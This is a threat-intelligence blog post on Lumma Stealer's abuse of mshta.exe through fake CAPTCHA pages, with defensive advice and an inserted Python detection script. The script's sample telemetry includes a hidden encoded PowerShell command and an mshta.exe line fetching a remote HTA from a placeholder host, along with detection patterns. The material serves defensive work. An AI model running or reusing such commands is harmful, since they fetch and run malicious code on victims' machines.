DEFENSESTORM BLOG

Living Off the Land: How Lumma Stealer Weaponized Legitimate Windows Tools

Wednesday, May 28th, 2025


In the ever-evolving world of cybersecurity, threats are becoming more sophisticated, stealthy, and scalable. One such threat that has made headlines in 2025 is Lumma Stealer—a powerful information-stealing malware that has wreaked havoc across the globe.

Lumma Stealer, also known as LummaC2, is a Malware-as-a-Service (MaaS) platform that allows cybercriminals to rent and deploy malware designed to steal sensitive information from infected devices. First surfacing in 2022, it has rapidly evolved into one of the most notorious infostealers on the dark web.

Among the many sophisticated delivery methods used by Lumma Stealer, one particularly stealthy and effective technique involves abusing mshta.exe, a legitimate Windows utility used to execute HTML Applications (HTA files). This method allows attackers to bypass traditional defenses and execute malicious payloads with minimal user interaction.

Key Features:

  • Credential Harvesting: Extracts saved usernames and passwords from browsers.
  • Cookie Theft: Captures session cookies to hijack user sessions.
  • Credit Card Data: Steals payment information stored in browsers.
  • Crypto Wallet Hijacking: Targets both hot and cold wallets.
  • 2FA Bypass: Collects authentication tokens and backup codes.
  • Loader Capabilities: Can download and execute additional malware payloads.

How It Works

Lumma Stealer is typically distributed through phishing emails, malicious downloads, or fake software updates. Once executed, it silently collects data and sends it to a command-and-control (C2) server operated by the attacker. The malware is modular, allowing threat actors to customize its behavior based on their goals.

In recent attacks, Lumma Stealer operators have adopted a very effective technique that abuses mshta.exe, a legitimate Windows utility used to execute HTML Applications (HTA files). Before walking through the attack chain, it helps to understand what mshta.exe is. mshta.exe is a built-in Windows binary that executes .hta files, HTML applications that can contain VBScript or JavaScript. Because it is a trusted system component, it is often whitelisted by security tools, which makes it a prime target for abuse in Living-off-the-Land Binary (LOLBin) attacks.

Referencing recent attacks, here’s how Lumma Stealer operators have used mshta.exe in their active campaigns:

  • Initial Lure: Victims are tricked into visiting a fake CAPTCHA page hosted on a compromised or malicious site.
  • User Interaction: When the user clicks the “I’m not a robot” button, a Base64-encoded PowerShell script is copied to the clipboard or executed directly.
  • Payload Delivery:
    • The PowerShell script downloads a remote HTA file.
    • This HTA file is then executed using mshta.exe, which downloads and runs a malicious PE file (e.g., a trojanized version of Dialer.exe).
  • Script Execution:
    • The PE file contains an overlay section with embedded JavaScript.
    • This script is obfuscated and uses polyglot techniques, embedding valid HTA content inside other file types to evade detection.
  • Final Payload: The script ultimately downloads and executes the Lumma Stealer binary, which begins harvesting credentials, cookies, crypto wallets, and more.

Global Disruption: Microsoft’s Crackdown

In a win for cybersecurity, Microsoft’s Digital Crimes Unit (DCU) led a global operation in May 2025 to dismantle Lumma Stealer’s infrastructure. This effort, in collaboration with the U.S. Department of Justice, Europol, and Japan’s JC3, resulted in:

  • Seizure of over 2,300 malicious domains
  • Shutdown of multiple C2 servers
  • Redirection of traffic to Microsoft-controlled sinkholes
  • Mitigation of over 394,000 infected Windows devices

This takedown significantly disrupted the malware’s operations and its underground marketplace, where it was being sold to cybercriminals for as little as $250/month.

Reference: https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/

DefenseStorm Recommendations

While Microsoft’s action should significantly slow Lumma Stealer’s operations for the time being, the service is not going anywhere, so it is important to remain vigilant.

Here are several ways to defend against this threat:

  • Block or Monitor mshta.exe: If not needed in your environment, disable or restrict its use via AppLocker or Windows Defender Application Control (WDAC).
  • Behavioral Detection: Use EDR tools to detect suspicious child processes spawned by mshta.exe, especially those involving PowerShell or network activity.
  • Email and Web Filtering: Prevent access to known malicious domains and block phishing attempts that lead to fake CAPTCHA pages.
  • User Awareness: Train users to recognize suspicious prompts and avoid interacting with unexpected CAPTCHA or verification pages.
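The behavioral detection recommended above can be expressed directly against process-creation and network telemetry. The following is an added example (not DefenseStorm’s or Microsoft’s code) that runs the mshta.exe checks from the attack chain over constructed, Sysmon-style events; the paths, host name, address and the encoded command are placeholders, and the event layout is a simplified stand-in for whatever your EDR or SIEM emits.

```python
# Added example (not DefenseStorm's or Microsoft's code): detection logic for the
# mshta.exe behaviours described in the post, run over constructed Sysmon-style events.
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
REMOTE_ARG = re.compile(r"https?://|\\\\", re.I)                    # URL or UNC path on the command line
ENCODED_FLAG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\b", re.I)  # -e / -ec / -enc / -EncodedCommand
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"

# Constructed telemetry modelled on the chain in the post; host, address and the encoded blob are placeholders.
EVENTS = [
    {"id": 1, "pid": 100, "image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\winlogon.exe", "cmd": "explorer.exe"},
    # fake-CAPTCHA lure: encoded PowerShell one-liner pasted into the Run dialog
    {"id": 1, "pid": 200, "image": PS, "parent": r"C:\Windows\explorer.exe", "cmd": "powershell.exe -w hidden -enc QQBCAEMA"},
    # that script hands a remote HTA to mshta.exe, which then talks to the network
    {"id": 1, "pid": 300, "image": MSHTA, "parent": PS, "cmd": "mshta.exe http://captcha.example.invalid/verify.hta"},
    {"id": 3, "pid": 300, "image": MSHTA, "dst": "203.0.113.10:443"},
    # the HTA drops and runs a PE from a user-writable path (the trojanized Dialer.exe in the post)
    {"id": 1, "pid": 400, "image": r"C:\Users\alice\AppData\Local\Temp\Dialer.exe", "parent": MSHTA, "cmd": "Dialer.exe"},
    # benign: a locally installed help HTA opened from Explorer; should not fire
    {"id": 1, "pid": 500, "image": MSHTA, "parent": r"C:\Windows\explorer.exe", "cmd": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: list) -> list:
    findings = []  # (pid, reason); one event may yield several findings
    for e in events:
        img, pid = base(e["image"]), e["pid"]
        if e["id"] == 3:                                   # network connection event
            if img == "mshta.exe":
                findings.append((pid, f"mshta.exe connected to {e['dst']}"))
            continue
        parent = base(e["parent"])                         # process-creation event
        if img == "mshta.exe" and REMOTE_ARG.search(e["cmd"]):
            findings.append((pid, "mshta.exe given a remote HTA"))
        if img == "mshta.exe" and parent in SCRIPT_HOSTS:
            findings.append((pid, f"mshta.exe spawned by {parent}"))
        if parent == "mshta.exe" and (img in SCRIPT_HOSTS or not e["image"].lower().startswith(r"c:\windows")):
            findings.append((pid, f"mshta.exe spawned child {img}"))
        if img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and ENCODED_FLAG.search(e["cmd"]):
            findings.append((pid, "encoded PowerShell launched from Explorer (Run/clipboard paste)"))
    return findings

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The benign local HTA produces no finding, while each stage of the described chain trips at least one rule, so a single alert on any of them is enough to surface the whole sequence for triage.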

As always, DefenseStorm recommends the following:

  • Continued internal training for phishing campaigns
  • Block threat indicators at their respective controls
  • Keep all systems and software updated to the latest patched versions to best protect against all known security vulnerabilities
  • Maintain a strong password policy
  • Enable multi-factor authentication
  • Regularly back up data, and keep air-gapped, password-protected backup copies offline
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location
  • Use app hardening
  • Restrict administrative access

Ian Gibson

Cyber Threat Intelligence Engineer

Ian Gibson is a Cyber Threat Intelligence Engineer for DefenseStorm. He joined the company in 2019 after graduating with a bachelor’s in Information Technology from the University of North Carolina: Wilmington. During his time at UNCW, he completed a specialized curriculum path in Cyber Defense Education. Joining DefenseStorm first as an intern, Ian worked in many positions throughout the company, which allowed him to become an expert in several areas of the platform. During his cyber career, Ian has been instrumental in proactively detecting and responding to cyber incidents, developing new policies and analytics to improve the detection and prevention of potential attacks, and training customers to better utilize DefenseStorm’s services. Ian has completed all tracks of the MITRE ATT&CK® Defender certifications, which helped him gain a better understanding of how to apply the knowledge of adversary behaviors to improve security configurations, analytics, and decision-making when it comes to best protecting DefenseStorm clients. Ian also holds a GIAC Cyber Threat Intelligence (GCTI) certification.